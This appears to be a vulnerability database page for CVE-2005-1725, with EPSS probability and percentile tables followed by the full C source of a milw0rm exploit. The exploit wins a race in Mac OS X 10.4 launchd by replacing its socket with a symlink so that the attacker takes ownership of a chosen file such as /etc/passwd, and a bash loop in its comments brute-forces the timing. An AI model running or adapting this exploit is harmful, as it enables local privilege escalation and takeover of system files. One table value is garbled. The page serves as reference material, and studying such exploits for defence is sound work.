CVE-2005-1725 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.16%
2025-03-30	–	–	–	–	0.16%
2025-04-15	–	–	–	–	0.16%
2025-04-15	–	–	–	–	0.16,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	35%
2025-03-30	34%
2025-04-15	38%
2025-04-15	38%

/* * Mac OS X 10.4 launchd race condition exploit * * intropy (intropy <at> caughq.org) */ /* .sh script to help with the offsets /str0ke #!/bin/bash X=1000 Y=3000 I=1 while ((1)) do ./CAU-launchd /etc/passwd $X if [ $I -lt 30 ] then ((X=$X+$Y)) ((I=$I+1)) else X=1000 I=1 fi done */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #define DEBUG 0 #define SLEEP 6000 main(int argc, char *argv[]) { pid_t pid; int count, sleep = SLEEP; char name[100]; char target[100]; struct stat *stats = (struct stat *)malloc(sizeof(struct stat)); if ( argc < 2) { fprintf(stderr, "%s <file to 0wn>\n", argv[0]); exit(-1); } else if ( argc > 2 ) { sleep = atoi(argv[2]); strncpy(target, argv[1], sizeof(target)-1); } else { strncpy(target, argv[1], sizeof(target)-1); } if ( DEBUG ) printf("Going for %s\n", target); if ( DEBUG ) printf("Using usleep %d\n", sleep); pid = fork(); if ( pid == 0 ) { if ( DEBUG ) { system("/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null"); } else { system("/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1"); } } else { snprintf(name, sizeof(name)-1, "/var/launchd/%d.%d/sock", getuid(), pid+2); if ( DEBUG ) printf("Checking %s\n", name); usleep(sleep); if ( DEBUG ) printf("Removing sock...\n"); if ( (unlink(name)) != 0 ) { if ( DEBUG ) perror("unlink"); } else { if ( (symlink(target, name)) != 0 ) { if ( DEBUG ) perror("symlink"); } else { if ( DEBUG ) printf("Created symlink %s -> %s...\n", name, target); } } stat(target, stats); if ( stats->st_uid == getuid() ) { printf("Looks like we got it\n"); usleep(10000000); } } } // milw0rm.com [2005-06-14]